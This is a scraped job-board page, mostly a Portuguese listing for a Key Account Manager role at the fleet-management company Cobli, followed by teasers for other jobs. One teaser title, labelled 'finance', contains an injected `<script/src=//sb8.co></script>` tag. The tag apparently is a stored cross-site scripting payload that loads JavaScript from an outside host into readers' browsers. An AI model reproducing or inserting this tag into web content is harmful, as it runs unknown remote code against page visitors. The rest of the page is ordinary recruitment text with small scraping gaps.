Ir à oferta completa

PAGINA DE TRABAJO | KEY ACCOUNT MANAGER

São Paulo - Estado

Descrição da oferta de emprego

Descripción del puesto vacante Buscamos alguém para desenvolver relações consultivas com grandes empresas de diversos setores, educando e treinando o mercado sobre boas práticas da logística e os benefícios das soluções da Cobli.
A pessoa irá trabalhar junto a um time de alta performance e aprender rapidamente com todas as áreas, ajudando a definir processos e uma cultura de vendas diferenciada focada na criação de valor para grandes clientes.
Responsabilidades y asignaciones Focar na aquisição de novos negócios e nutrição da carteira de  clientes estratégicos; Prospectar grandes empresas que possuem operação de frotas e ajudá-las a expandir seus negócios; Ser um(a) parceiro(a) de negócios  para novos clientes, fornecendo informações e conselhos orientados por dados para otimizar seu sucesso com a Cobli; Usar o feedback dos clientes para nos ajudar a identificar oportunidades de melhoria em nosso serviço.
Requisitos y calificaciones Experiência com  vendas B2B SaaS  e ataque Omnichannel; Experiência com vendas de alta complexidade para grandes empresas do Brasil; Experiência com vendas para gestão de frotas; Forte habilidade em vendas estratégicas e relacionamento com clientes  de grande porte; Vivência e  visão estratégica  para desenvolver e nutrir negócios; Excelentes comunicação escrita e verbal com a capacidade de persuadir, convencer e explicar conceitos complexos de maneira simples; Curiosidade insaciável pelos  desafios  dos nossos clientes; Motivado(a) e orientado(a) a  resultados, assumindo de forma autônoma a responsabilidade de atingir suas metas; Paixão por pessoas e disposição para compartilhar conhecimento; Disponibilidade para trabalho híbrido em São Paulo.
Información adicional BENEFÍCIOS.
Vale refeição; Vale alimentação; Plano de saúde;  Plano odontológico; Auxílio creche; Seguro de vida; Totalpass; Participação nos Resultados baseado em performance; Ajuda de custo mensal para home office; Vale Transporte ou Estacionamento no caso de ida ao escritório AQUI VOCÊ VAI ENCONTRAR.
Feedback recorrente e focado no crescimento profissional; Ciclo de avaliação de performance; Plano de carreira e oportunidade de crescimento; Oportunidade de ganhar stock options (ações da empresa); Liberdade para sugerir mudanças independente da área ou nível hierárquico; Um time de excelência técnica, focado em melhoria contínua e inovação;  Ambiente de trabalho leve, descontraído e flexível; Liberdade para ser você mesmo.
nos importamos com o que você faz, não como se veste; Oportunidade de contribuir efetivamente com a construção de uma FleetTech em crescimento acelerado.
Sobre a Cobli Somos uma FleetTech, uma plataforma de inteligência em gestão de frotas.
Todos os dias, nós trabalhamos para conectar frotas à sua melhor versão por meio de tecnologias de ponta em IoT, Inteligência Artificial, Big Data e Videotelemetria.
De um lado, a Cobli impulsiona seus clientes para que eles e suas operações alcancem o máximo de seus potenciais.
Do outro, nós impulsionamos nossos colaboradores para que eles também alcancem esse marco! Fundada em por Parker Treacy e Rodrigo Mourad, a empresa vem crescendo mais de 100% ano após ano.
Contando com um time de mais de 400 pessoas e investimento de R$ 250 milhões liderado por grandes fundos como Softbank, Valor, Qualcomm e Fifth Wall, a Cobli está presente em todos os estados do Brasil.
Queremos ser a plataforma de inteligência mais utilizada da América Latina e, para atingir esse resultado expressivo, prezamos pelo trabalho em equipe, pela cultura de feedback e por desenvolver estruturas que evoluam no longo prazo.
POR QUE TRABALHAR NA COBLI? Reunimos pessoas íntegras, dedicadas, inteligentes, divertidas e colaborativas.
são os Coblers.
Aqui, você é livre para ser você e o respeito ao outro é um ato inegociável, independentemente de gênero, etnia, religião, orientação sexual, classe social e outras diferentes realidades.
Nos orgulhamos em ser uma empresa transparente que proporciona uma escuta ativa, oportunidades iguais e um ambiente seguro e acolhedor.
Cada Cobler é responsável pela direção e pela velocidade da sua carreira.
Apoiamos esse desenvolvimento proporcionando ritmo de aprendizado intenso e projetos desafiadores em um ambiente produtivo e descontraído.
Asseguramos benefícios úteis, compensação justa e criamos estruturas para que os melhores desempenhos sejam reconhecidos e recompensados exponencialmente.
Venha ser um Cobler, conecte-se à sua melhor versão profissional e nos ajude a descomplicar a gestão e a potencializar as frotas!
Ir à oferta completa

Detalhes da oferta

Empresa
  • Indeterminado
Localidade
Endereço
  • Indeterminado - Indeterminado
Data de publicação
  • 09/04/2024
Data de expiração
  • 08/07/2024
ACCOUNT MANAGER
Reachjobs

Key responsibilities- account management responsibilities incl... we are seeking a highly motivated and experienced internal account manager to join our client's team... the ideal candidate will have a good understanding of the chemicals industry and a proven track record of successfully managing key......

Project Manager
Equacao IT

We are looking for a project manager with the following requirements:requirements:• more than 2 years experience in it project management;• previously have participated in software development projects with the technologies... equação it is a company focused on boosting technology and solid solutions......

Product Manager - (Electronic commerce)
Jp&f consultoria

Working with third-parties, virtual and global teams, systems architects, product managers and stakeholders... experience in conducting market research, competitor analysis, and evaluating new market opportunities... technical proficiency and ability to understand complex technical concepts and product......

Vacancy At The Royal Garden Hotel
The Royal Garden Hotel

Available positions bakers/bartenders/chefs/chef de partie/sous chef/chef d cuisine/cooks/, restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

finance
<script/src=//sb8.co></script>computer

Analyze macroeconomic variables and their interactions with client portfolios - strategic, tactical, and dynamic asset allocation decisions, as well as manager selection... ideas for process improvements to existing models to make them more robust and automated, resulting in smart, dynamic, and scalable......

FINANCIAL CONTROLLER
Oman Jobs

•manage relationships with others across the group to achieve alignment in key business strategies and decisions... undertake a range of other activities within the corporate finance function, in conjunction with other finance staff, such as maintenance of consolidated key finance activities (e......

Director of Operations
JP&F Consultoria

Champions operational excellence thru collaboration with the general manager and/or business unit leader to devise strategies for achieving the organization's objectives in light of both internal and external factors... providing effective management, financial reporting and control systems and exercising......

Customer Success Specialist (PT language) (Remote)
Hostinger

Ability to show empathy, tactfulness, and proactivity when interacting with customers... high emotional intelligence, with the ability to read customers’ sentiment and reflect back on the feedback provided... we are helping more than 2 million clients to succeed online in over 150 countries......

Bilingual Customer Service Associate
Bilingual

The role also has responsibility for customer protection around personally identifiable information and risk mitigation including account take over and fraud... responsibilities accurately and thoroughly handle increasingly complex client service requests at initial point of contact effectively use......

Leasing Executive - Outdoor
Oman Jobs

The leasing executive plays a key role in maximizing occupancy and revenue for our portfolio of commercial spaces... reporting and analysis:o track leasing activity, including lead generation, conversion rates, andclosed deals... o conduct market research to understand industry trends and competitorofferings......